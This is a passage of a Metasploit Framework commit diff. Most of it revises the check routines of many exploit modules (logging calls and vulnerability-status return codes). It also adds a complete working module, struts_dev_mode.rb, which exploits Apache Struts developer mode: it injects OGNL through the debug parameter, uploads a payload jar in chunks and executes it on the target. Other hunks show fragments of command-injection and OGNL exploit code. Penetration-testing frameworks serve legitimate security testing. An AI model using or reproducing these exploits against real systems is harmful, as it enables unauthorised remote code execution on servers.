rescue Errno::ECONNRESET => reset
unless datastore['NRPESSL'] or @force_ssl
print_status("Retrying with ADH SSL")
vprint_status("Retrying with ADH SSL")
@force_ssl = true
retry
end

10
modules/exploits/linux/misc/sercomm_exec.rb
View File

@ -141,14 +141,14 @@ class Metasploit3 < Msf::Exploit::Remote
case fprint
when 'BE'
print_status("Detected Big Endian")
return Msf::Exploit::CheckCode::Vulnerable
vprint_status("Detected Big Endian")
return Msf::Exploit::CheckCode::Appears
when 'LE'
print_status("Detected Little Endian")
return Msf::Exploit::CheckCode::Vulnerable
vprint_status("Detected Little Endian")
return Msf::Exploit::CheckCode::Appears
end
return Msf::Exploit::CheckCode::Unknown
return Msf::Exploit::CheckCode::Safe
end
def exploit

8
modules/exploits/linux/misc/zabbix_server_exec.rb
View File

@ -82,17 +82,17 @@ class Metasploit3 < Msf::Exploit::Remote
cmd = "echo #{clue}"
connect
print_status("#{peer} - Sending 'Command' request...")
vprint_status("#{peer} - Sending 'Command' request...")
res = send_command(sock, node_id, cmd)
disconnect
if res
print_status(res)
vprint_status(res)
if res =~ /#{clue}/
return Exploit::CheckCode::Vulnerable
elsif res =~ /-1/ and res=~ /NODE (\d*)/
node_id = $1
print_good("#{peer} - Node ID #{node_id} discovered")
vprint_good("#{peer} - Node ID #{node_id} discovered")
else
return Exploit::CheckCode::Safe
end
@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Retry with the good node_id
connect
print_status("#{peer} - Sending 'Command' request with discovered Node ID...")
vprint_status("#{peer} - Sending 'Command' request with discovered Node ID...")
res = send_command(sock, node_id, cmd)
disconnect
if res and res =~ /#{clue}/

2
modules/exploits/linux/postgres/postgres_payload.rb
View File

@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
version = postgres_fingerprint
if version[:auth]
return CheckCode::Vulnerable
return CheckCode::Appears
else
print_error "Authentication failed. #{version[:preauth] || version[:unknown]}"
return CheckCode::Safe

2
modules/exploits/linux/samba/setinfopolicy_heap.rb
View File

@ -282,7 +282,7 @@ class Metasploit3 < Msf::Exploit::Remote
version = smb_peer_lm().scan(/Samba (\d\.\d.\d*)/).flatten[0]
minor = version.scan(/\.(\d*)$/).flatten[0].to_i
print_status("Version found: #{version}")
vprint_status("Version found: #{version}")
return Exploit::CheckCode::Appears if version =~ /^3\.4/ and minor < 16
return Exploit::CheckCode::Appears if version =~ /^3\.5/ and minor < 14

2
modules/exploits/multi/ftp/wuftpd_site_exec_format.rb
View File

@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
ret = connect_login
# We just want the banner to check against our targets..
print_status("FTP Banner: #{banner.strip}")
vprint_status("FTP Banner: #{banner.strip}")
status = Exploit::CheckCode::Safe
if banner =~ /Version wu-2\.(4|5)/
status = Exploit::CheckCode::Appears

2
modules/exploits/multi/http/activecollab_chat.rb
View File

@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote
if (cms and cms.body =~ /powered by activeCollab/)
# detect the chat module
if (chat and chat.code == 200)
return Exploit::CheckCode::Vulnerable
return Exploit::CheckCode::Detected
end
end
return Exploit::CheckCode::Safe

2
modules/exploits/multi/http/apprain_upload_exec.rb
View File

@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
})
if res and res.code == 200 and res.body.empty?
return Exploit::CheckCode::Detected
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end

2
modules/exploits/multi/http/auxilium_upload_exec.rb
View File

@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php")
})
if res and res.body =~ /\<title\>Pet Rate Admin \- Banner Manager\<\/title\>/
return Exploit::CheckCode::Appears
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end

20
modules/exploits/multi/http/cisco_dcnm_upload.rb
View File

@ -88,6 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote
})
unless res
vprint_error("Connection timed out")
return Exploit::CheckCode::Unknown
end
@ -95,19 +96,18 @@ class Metasploit3 < Msf::Exploit::Remote
res.body.to_s =~ /Data Center Network Manager/ and
res.body.to_s =~ /<div class="productVersion">Version: (.*)<\/div>/
version = $1
print_status("Cisco Primer Data Center Network Manager version #{version} found")
elsif res.code == 200 and
res.body.to_s =~ /Data Center Network Manager/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
vprint_status("Cisco Primer Data Center Network Manager version #{version} found")
if version =~ /6\.1/
return Exploit::CheckCode::Vulnerable
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
elsif res.code == 200 and res.body.to_s =~ /Data Center Network Manager/
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
def exploit

4
modules/exploits/multi/http/coldfusion_rds.rb
View File

@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote
})
if res and res.code == 200 and res.body.to_s =~ /ColdFusion Administrator Login/
print_good "#{peer} - Administrator access available"
vprint_good "#{peer} - Administrator access available"
else
return Exploit::CheckCode::Safe
end
@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
imghash = "596b3fc4f1a0b818979db1cf94a82220"
if img == imghash
print_good "#{peer} - ColdFusion 9 Detected"
vprint_good "#{peer} - ColdFusion 9 Detected"
else
return Exploit::CheckCode::Safe
end

2
modules/exploits/multi/http/cuteflow_upload_exec.rb
View File

@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
})
if res.body =~ /\<strong style\=\"font\-size\:8pt\;font\-weight\:normal\"\>Version 2\.11\.2\<\/strong\>\<br\>/
return Exploit::CheckCode::Vulnerable
return Exploit::CheckCode::Appears
elsif res.body =~ /\<a href\=\"http\:\/\/cuteflow\.org" target\=\"\_blank\"\>/
return Exploit::CheckCode::Detected
else

2
modules/exploits/multi/http/eaton_nsm_code_exec.rb
View File

@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = execute_php_code("phpinfo();die();")
if not res or res.code != 200
print_error("Failed: Error requesting page")
vprint_error("Failed: Error requesting page")
return CheckCode::Unknown
end

7
modules/exploits/multi/http/extplorer_upload_exec.rb
View File

@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if res.body =~ /<version>2\.1\.(0RC\d|0|1|2)<\/version>/
return Exploit::CheckCode::Vulnerable
return Exploit::CheckCode::Appears
end
if res.body =~ /eXtplorer/
@ -79,9 +79,10 @@ class Metasploit3 < Msf::Exploit::Remote
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{peer} - Connection failed")
end
vprint_error("#{peer} - Connection failed")
return Exploit::CheckCode::Unknown
end
return Exploit::CheckCode::Safe
end

40
modules/exploits/multi/http/glassfish_deployer.rb
View File

@ -364,7 +364,16 @@ class Metasploit3 < Msf::Exploit::Remote
#
# Return POST data and data length, based on GlassFish edition
#
def get_upload_data(boundary, version, war, app_base, typefield='', status_checkbox='', start='', viewstate='')
def get_upload_data(opts = {})
boundary = opts[:boundary]
version = opts[:version]
war = opts[:war]
app_base = opts[:app_base]
typefield = opts[:typefield]
status_checkbox = opts[:status_checkbox]
start = opts[:start]
viewstate = opts[:viewstate]
data = ''
if version == '3.0'
@ -501,7 +510,14 @@ class Metasploit3 < Msf::Exploit::Remote
# Upload our payload, and execute it. This function will also try to automatically
# clean up after itself.
#
def upload_exec(session, app_base, jsp_name, target, war, edition, version)
def upload_exec(opts = {})
session = opts[:session]
app_base = opts[:app_base]
jsp_name = opts[:jsp_name]
war = opts[:war]
edition = opts[:edition]
version = opts[:version]
if version == '2.x' or version == '9.x'
path = "/applications/upload.jsf?appType=webApp"
res = send_request(path, @verbs['GET'], session)
@ -553,7 +569,16 @@ class Metasploit3 < Msf::Exploit::Remote
ctype = "multipart/form-data; boundary=---------------------------#{boundary}"
end
post_data = get_upload_data(boundary, version, war, app_base, typefield, status_checkbox, start, viewstate)
post_data = get_upload_data({
:boundary => boundary,
:version => version,
:war => war,
:app_base => app_base,
:typefield => typefield,
:status_checkbox => status_checkbox,
:start => start,
:viewstate => viewstate
})
#Upload our payload
if version == '2.x' or version == '9.x'
@ -816,7 +841,14 @@ class Metasploit3 < Msf::Exploit::Remote
#Upload, execute, cleanup, winning
print_status("Uploading payload...")
res = upload_exec(session, app_base, jsp_name, mytarget, war, edition, version)
res = upload_exec({
:session => session,
:app_base => app_base,
:jsp_name => jsp_name,
:war => war,
:edition => edition,
:version => version
})
else
print_error("#{my_target_host()} - GlassFish - Failed to authenticate login")
end

10
modules/exploits/multi/http/glossword_upload_exec.rb
View File

@ -59,18 +59,18 @@ class Metasploit3 < Msf::Exploit::Remote
res = login(base, user, pass)
if res
if res.code == 200
print_error("#{peer} - Authentication failed")
vprint_error("#{peer} - Authentication failed")
return Exploit::CheckCode::Unknown
elsif res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/
print_good("#{peer} - Authenticated successfully")
vprint_good("#{peer} - Authenticated successfully")
return Exploit::CheckCode::Appears
end
end
return Exploit::CheckCode::Safe
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{peer} - Connection failed")
vprint_error("#{peer} - Connection failed")
end
return Exploit::CheckCode::Unknown
return Exploit::CheckCode::Safe
end

4
modules/exploits/multi/http/glpi_install_rce.rb
View File

@ -69,10 +69,10 @@ class Metasploit3 < Msf::Exploit::Remote
m = Regexp.new(re, Regexp::IGNORECASE)
matched = m.match(res.body)
if matched and matched[3] =~ /0.(8[0-4].[0-1])|([0-7][0-9].[0-9])/
print_good("Detected Version : #{matched[3]}")
vprint_good("Detected Version : #{matched[3]}")
return Exploit::CheckCode::Appears
elsif matched
print_error("Version #{matched[3]} is not vulnerable")
vprint_error("Version #{matched[3]} is not vulnerable")
end
return Exploit::CheckCode::Safe

4
modules/exploits/multi/http/hp_sys_mgmt_exec.rb
View File

@ -77,12 +77,12 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_command(cmd)
if not res
print_error("#{peer} - Connection timed out")
vprint_error("#{peer} - Connection timed out")
return Exploit::CheckCode::Unknown
end
if res.code == 200 && res.body =~ /#{sig}/
print_good("#{peer} - Running with user '#{res.body.split(sig)[1].strip}'")
vprint_good("#{peer} - Running with user '#{res.body.split(sig)[1].strip}'")
return Exploit::CheckCode::Vulnerable
end

10
modules/exploits/multi/http/hyperic_hq_script_console.rb
View File

@ -105,20 +105,20 @@ class Metasploit3 < Msf::Exploit::Remote
pass = datastore['PASSWORD']
# login
print_status("#{peer} - Authenticating as '#{user}'")
vprint_status("#{peer} - Authenticating as '#{user}'")
res = login(user, pass)
if res and res.code == 302 and res.headers['location'] !~ /authfailed/
print_good("#{peer} - Authenticated successfully as '#{user}'")
vprint_good("#{peer} - Authenticated successfully as '#{user}'")
# check access to the console
print_status("#{peer} - Checking access to the script console")
vprint_status("#{peer} - Checking access to the script console")
get_nonce
if @nonce.nil?
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Vulnerable
return Exploit::CheckCode::Appears
end
elsif res.headers.include?('X-Jenkins') or res.headers['location'] =~ /authfailed/
print_error("#{peer} - Authentication failed")
vprint_error("#{peer} - Authentication failed")
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe

3
modules/exploits/multi/http/ispconfig_php_exec.rb
View File

@ -52,9 +52,6 @@ class Metasploit4 < Msf::Exploit::Remote
], self.class)
end
def check
end
def lng
datastore['LANGUAGE']
end

12
modules/exploits/multi/http/jboss_invoke_deploy.rb
View File

@ -90,20 +90,20 @@ class Metasploit4 < Msf::Exploit::Remote
def check
res = send_serialized_request('version.bin')
if res.nil?
print_error("Connection timed out")
vprint_error("Connection timed out")
return Exploit::CheckCode::Unknown
elsif res.code != 200
print_error("Unable to request version, returned http code is: #{res.code.to_s}")
vprint_error("Unable to request version, returned http code is: #{res.code.to_s}")
return Exploit::CheckCode::Unknown
end
# Check if the version is supported by this exploit
return Exploit::CheckCode::Vulnerable if res.body =~ /CVSTag=Branch_4_/
return Exploit::CheckCode::Vulnerable if res.body =~ /SVNTag=JBoss_4_/
return Exploit::CheckCode::Vulnerable if res.body =~ /SVNTag=JBoss_5_/
return Exploit::CheckCode::Appears if res.body =~ /CVSTag=Branch_4_/
return Exploit::CheckCode::Appears if res.body =~ /SVNTag=JBoss_4_/
return Exploit::CheckCode::Appears if res.body =~ /SVNTag=JBoss_5_/
if res.body =~ /ServletException/ # Simple check, if we caused an exception.
print_status("Target seems vulnerable, but the used JBoss version is not supported by this exploit")
vprint_status("Target seems vulnerable, but the used JBoss version is not supported by this exploit")
return Exploit::CheckCode::Appears
end

13
modules/exploits/multi/http/kordil_edms_upload_exec.rb
View File

@ -57,17 +57,18 @@ class Metasploit3 < Msf::Exploit::Remote
})
if res and res.code == 200
if res.body =~ /<center><font face="Arial" size="2">Kordil EDMS v2\.2\.60/
return Exploit::CheckCode::Vulnerable
return Exploit::CheckCode::Appears
elsif res.body =~ /Kordil EDMS v/
return Exploit::CheckCode::Detected
end
end
return Exploit::CheckCode::Safe
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{peer} - Connection failed")
end
return Exploit::CheckCode::Unknown
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
vprint_error("#{peer} - Connection failed")
return Exploit::CheckCode::Unknown
end
return Exploit::CheckCode::Safe
end
def upload(base, file)

6
modules/exploits/multi/http/lcms_php_exec.rb
View File

@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
def check
target_url
if @uri.empty? or @arg.empty?
print_error("Unable to get the page parameter, please reconfigure URI")
vprint_error("Unable to get the page parameter, please reconfigure URI")
return
end
@ -110,10 +110,10 @@ class Metasploit3 < Msf::Exploit::Remote
}, 20)
if response and response.body =~ /#{signature}/
print_status("Signature: #{signature}")
vprint_status("Signature: #{signature}")
return Exploit::CheckCode::Vulnerable
else
print_error("Signature was not detected")
vprint_error("Signature was not detected")
return Exploit::CheckCode::Safe
end
end

2
modules/exploits/multi/http/manageengine_search_sqli.rb
View File

@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = sqli_exec(Rex::Text.rand_text_alpha(1))
if res and res.body =~ /Error during search/
return Exploit::CheckCode::Appears
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end

2
modules/exploits/multi/http/movabletype_upgrade_exec.rb
View File

@ -70,7 +70,7 @@ class Metasploit4 < Msf::Exploit::Remote
def check
fingerprint = rand_text_alpha(5)
print_status("#{peer} - Sending check...")
vprint_status("#{peer} - Sending check...")
begin
res = http_send_raw(fingerprint)
rescue Rex::ConnectionError

4
modules/exploits/multi/http/op5_license.rb
View File

@ -54,8 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
print_status("Attempting to detect if the OP5 Monitor is vulnerable...")
print_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}")
vprint_status("Attempting to detect if the OP5 Monitor is vulnerable...")
vprint_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}")
# Try running/timing 'ping localhost' to determine is system is vulnerable
start = Time.now

4
modules/exploits/multi/http/op5_welcome.rb
View File

@ -54,8 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
print_status("Attempting to detect if the OP5 Monitor is vulnerable...")
print_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}")
vprint_status("Attempting to detect if the OP5 Monitor is vulnerable...")
vprint_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}")
# Try running/timing 'ping localhost' to determine is system is vulnerable
start = Time.now

8
modules/exploits/multi/http/openfire_auth_bypass.rb
View File

@ -97,18 +97,18 @@ class Metasploit3 < Msf::Exploit::Remote
})
if (not res) or (res.code != 200)
print_error("Unable to make a request to: #{path}")
vprint_error("Unable to make a request to: #{path}")
return Exploit::CheckCode::Unknown
end
versioncheck = res.body =~ /Openfire, \D*: (\d)\.(\d).(\d)\s*<\/div>/
if versioncheck.nil? then
print_error("Unable to detect Openfire version")
vprint_error("Unable to detect Openfire version")
return Exploit::CheckCode::Unknown
end
print_status("Detected version: #{$1}.#{$2}.#{$3}")
vprint_status("Detected version: #{$1}.#{$2}.#{$3}")
version = "#{$1}#{$2}#{$3}".to_i
return Exploit::CheckCode::Safe if version > 360
@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Vulnerable
Exploit::CheckCode::Appears
end
def get_plugin_jar(plugin_name)

2
modules/exploits/multi/http/openx_backdoor_php.rb
View File

@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
if response.nil?
CheckCode::Unknown
elsif response.body =~ /#{token} ((:?\d\.?)+)/
print_status("PHP Version #{$1}")
vprint_status("PHP Version #{$1}")
return CheckCode::Vulnerable
end
return CheckCode::Safe

6
modules/exploits/multi/http/php_cgi_arg_injection.rb
View File

@ -66,12 +66,12 @@ class Metasploit3 < Msf::Exploit::Remote
# -s Display colour syntax highlighted source.
def check
print_status("Checking uri #{uri}")
vprint_status("Checking uri #{uri}")
response = send_request_raw({ 'uri' => uri })
if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\&lt\;\?/mi and not datastore['PLESK']
print_error("Server responded in a way that was ambiguous, could not determine whether it was vulnerable")
vprint_error("Server responded in a way that was ambiguous, could not determine whether it was vulnerable")
return Exploit::CheckCode::Unknown
end
@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
return Exploit::CheckCode::Appears
end
print_error("Server responded indicating it was not vulnerable")
vprint_error("Server responded indicating it was not vulnerable")
return Exploit::CheckCode::Safe
end

2
modules/exploits/multi/http/phpldapadmin_query_engine.rb
View File

@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
}, 3)
if (res and res.body =~ /phpLDAPadmin \(1\.2\.[0|1]\.\d/i)
return Exploit::CheckCode::Vulnerable
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe

16
modules/exploits/multi/http/phpmyadmin_preg_replace.rb
View File

@ -64,18 +64,18 @@ class Metasploit3 < Msf::Exploit::Remote
begin
res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/js/messages.php') })
rescue
print_error("Unable to connect to server.")
vprint_error("Unable to connect to server.")
return CheckCode::Unknown
end
if res.code != 200
print_error("Unable to query /js/messages.php")
vprint_error("Unable to query /js/messages.php")
return CheckCode::Unknown
end
php_version = res['X-Powered-By']
if php_version
print_status("PHP Version: #{php_version}")
vprint_status("PHP Version: #{php_version}")
if php_version =~ /PHP\/(\d)\.(\d)\.(\d)/
if $1.to_i > 5
return CheckCode::Safe
@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
else
print_status("Unknown PHP Version")
vprint_status("Unknown PHP Version")
end
if res.body =~ /pmaversion = '(.*)';/
@ -99,15 +99,17 @@ class Metasploit3 < Msf::Exploit::Remote
when '3.5.8.1', '4.0.0-rc3'
return CheckCode::Safe
when '4.0.0-alpha1', '4.0.0-alpha2', '4.0.0-beta1', '4.0.0-beta2', '4.0.0-beta3', '4.0.0-rc1', '4.0.0-rc2'
return CheckCode::Vulnerable
return CheckCode::Appears
else
if $1.starts_with? '3.5.'
return CheckCode::Vulnerable
return CheckCode::Appears
end
return CheckCode::Unknown
return CheckCode::Detected
end
end
CheckCode::Safe
end
def exploit

2
modules/exploits/multi/http/phpscheduleit_start_date.rb
View File

@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
uri = normalize_uri(datastore['URI'])
uri << '/' if uri[-1,1] != '/'
print_status("Checking uri #{uri}")
vprint_status("Checking uri #{uri}")
response = send_request_cgi({
'method' => "POST",

2
modules/exploits/multi/http/phptax_exec.rb
View File

@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
if res and res.body =~ /PHPTAX by William L\. Berggren/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Unknown
return Exploit::CheckCode::Safe
end
end

2
modules/exploits/multi/http/plone_popen2.rb
View File

@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => uri
}, 25)
if (res.headers['Bobo-Exception-Type'].to_s =~ /zExceptions.BadRequest/)
return Exploit::CheckCode::Vulnerable
return Exploit::CheckCode::Appears
end
# patched == zExceptions.NotFound
return Exploit::CheckCode::Safe

2
modules/exploits/multi/http/pmwiki_pagelist.rb
View File

@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
}, 25)
if (res and res.body =~ /pmwiki-2.[0.00-2.34]/)
return Exploit::CheckCode::Vulnerable
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end

2
modules/exploits/multi/http/polarcms_upload_exec.rb
View File

@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
})
if not res or res.code != 200
return Exploit::CheckCode::Unknown
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Appears

7
modules/exploits/multi/http/processmaker_exec.rb
View File

@ -127,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote
# send check
fingerprint = Rex::Text.rand_text_alphanumeric(rand(10)+10)
print_status("#{peer} - Sending check")
vprint_status("#{peer} - Sending check")
begin
res = execute_command("echo #{fingerprint}")
if res and res.body =~ /#{fingerprint}/
@ -136,10 +136,11 @@ class Metasploit3 < Msf::Exploit::Remote
return Exploit::CheckCode::Safe
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
print_error("#{peer} - Connection failed")
end
vprint_error("#{peer} - Connection failed")
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Safe
end
#
# Write payload to filesystem

2
modules/exploits/multi/http/qdpm_upload_exec.rb
View File

@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_raw({'uri'=>normalize_uri(base, "/index.php")})
if res and res.body =~ /<div id\=\"footer\"\>.+qdPM ([\d])\.([\d]).+\<\/div\>/m
major, minor = $1, $2
return Exploit::CheckCode::Vulnerable if (major+minor).to_i <= 70
return Exploit::CheckCode::Appears if (major+minor).to_i <= 70
end
return Exploit::CheckCode::Safe

4
modules/exploits/multi/http/sit_file_upload.rb
View File

@ -70,10 +70,10 @@ class Metasploit3 < Msf::Exploit::Remote
if (res and res.body =~ /SiT! Support Incident Tracker v(\d)\.(\d\d)/)
ver = [ $1.to_i, $2.to_i ]
print_status("SiT! #{ver[0]}.#{ver[1]}")
vprint_status("SiT! #{ver[0]}.#{ver[1]}")
if (ver[0] == 3 and ver[1] == 65)
return Exploit::CheckCode::Vulnerable
return Exploit::CheckCode::Appears
elsif (ver[0] == 3 and ver[1] < 65)
return Exploit::CheckCode::Appears
end

4
modules/exploits/multi/http/sonicwall_gms_upload.rb
View File

@ -151,9 +151,9 @@ class Metasploit3 < Msf::Exploit::Remote
end
if install_path.include?("\\")
print_status("Target looks like Windows")
vprint_status("Target looks like Windows")
else
print_status("Target looks like Linux")
vprint_status("Target looks like Linux")
end
return Exploit::CheckCode::Vulnerable
end

2
modules/exploits/multi/http/splunk_upload_app_exec.rb
View File

@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote
}, 25)
if res and res.body =~ /Splunk Inc\. Splunk/
return Exploit::CheckCode::Appears
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end

2
modules/exploits/multi/http/struts_code_exec_parameters.rb
View File

@ -146,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote
sleep_time = datastore['CHECK_SLEEPTIME']
check_cmd = "@java.lang.Thread@sleep(#{sleep_time * 1000})"
t1 = Time.now
print_status("Asking remote server to sleep for #{sleep_time} seconds")
vprint_status("Asking remote server to sleep for #{sleep_time} seconds")
response = execute_command(check_cmd)
t2 = Time.now
delta = t2 - t1

4
modules/exploits/multi/http/struts_default_action_mapper.rb
View File

@ -149,7 +149,7 @@ class Metasploit3 < Msf::Exploit::Remote
})
if res.nil? or res.code != 200
print_error("#{rhost}:#{rport} - Check needs a valid action, returning 200, as TARGETURI")
vprint_error("#{rhost}:#{rport} - Check needs a valid action, returning 200, as TARGETURI")
return Exploit::CheckCode::Unknown
end
@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Unknown
return Exploit::CheckCode::Safe
end
def auto_target

142
modules/exploits/multi/http/struts_dev_mode.rb Normal file
View File

@ -0,0 +1,142 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Struts Developer Mode OGNL Execution',
'Description' => %q{
This module exploits a remote command execution vulnerability in Apache
Struts 2. The problem exists on applications running in developer mode,
where the DebuggingInterceptor allows evaluation and execution of OGNL
expressions, which allows remote attackers to execute arbitrary Java
code. This module has been tested successfully in Struts 2.3.16, Tomcat
7 and Ubuntu 10.04.
},
'Author' =>
[
'Johannes Dahse', # Vulnerability discovery and PoC
'Andreas Nusser', # Vulnerability discovery and PoC
'Alvaro', # @pwntester, 2014's PoC, avoided surname because of the spanish char, sorry about that :\
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2012-0394'],
[ 'OSVDB', '78276'],
[ 'EDB', '18329'],
[ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt' ],
[ 'URL', 'http://www.pwntester.com/blog/2014/01/21/struts-2-devmode/' ]
],
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Struts 2', { } ]
],
'DisclosureDate' => 'Jan 06 2012',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"])
], self.class)
end
def check
vprint_status("Testing to see if the target can evaluate our Java code...")
addend_one = rand_text_numeric(rand(3) + 1).to_i
addend_two = rand_text_numeric(rand(3) + 1).to_i
sum = addend_one + addend_two
res = execute_command("new java.lang.Integer(#{addend_one}+#{addend_two})")
if res and res.code == 200 and res.body.to_i == sum
return Exploit::CheckCode::Vulnerable
end
if res and res.code == 200 and res.body.to_s =~ /#{sum}/
vprint_status("Code got evaluated. Target seems vulnerable, but the response contains something else:")
vprint_line(res.body.to_s)
return Exploit::CheckCode::Appears
end
return CheckCode::Safe
end
def exploit
@payload_jar = rand_text_alphanumeric(4+rand(4)) + ".jar"
upload_jar
execute_jar
end
def upload_jar
append = 'false'
jar = payload.encoded_jar.pack
chunk_length = 384 # 512 bytes when base64 encoded
while(jar.length > chunk_length)
java_upload_part(jar[0, chunk_length], @payload_jar, append)
jar = jar[chunk_length, jar.length - chunk_length]
append='true'
end
java_upload_part(jar, @payload_jar, append)
end
def java_upload_part(part, filename, append = 'false')
cmd = "#f=new java.io.FileOutputStream('#{filename}',#{append}),"
cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),"
cmd << "#f.close()"
execute_command(cmd)
end
def execute_jar
cmd = ""
# disable Vararg handling (since it is buggy in OGNL used by Struts 2.1
cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
cmd << "#q.setAccessible(true),#q.set(null,true),"
cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
cmd << "#q.setAccessible(true),#q.set(null,false),"
# create classloader
cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_jar}').toURI().toURL()}),"
# load class
cmd << "#c=#cl.loadClass('metasploit.Payload'),"
# invoke main method
cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
execute_command(cmd)
end
def execute_command(cmd)
injection = "#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),CMD"
injection.gsub!(/CMD/, cmd)
vprint_status("Attempting to execute: #{cmd}")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s),
'method' => 'GET',
'vars_get' =>
{
'debug' => 'command',
'expression' => injection
}
})
return res
end
end

6
modules/exploits/multi/http/struts_include_params.rb
View File

@ -176,11 +176,11 @@ class Metasploit3 < Msf::Exploit::Remote
def check
#initialise some base vars
@inject = "${#_memberAccess[\"allowStaticMethodAccess\"]=true,CMD}"
print_status("Performing Check...")
vprint_status("Performing Check...")
sleep_time = datastore['CHECK_SLEEPTIME']
check_cmd = "@java.lang.Thread@sleep(#{sleep_time * 1000})"
t1 = Time.now
print_status("Asking remote server to sleep for #{sleep_time} seconds")
vprint_status("Asking remote server to sleep for #{sleep_time} seconds")
response = execute_command(check_cmd)
t2 = Time.now
delta = t2 - t1
@ -191,7 +191,7 @@ class Metasploit3 < Msf::Exploit::Remote
elsif delta < sleep_time
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Appears
return Exploit::CheckCode::Vulnerable
end
end

7
modules/exploits/multi/http/testlink_upload_exec.rb
View File

@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
if res
if res.code == 200
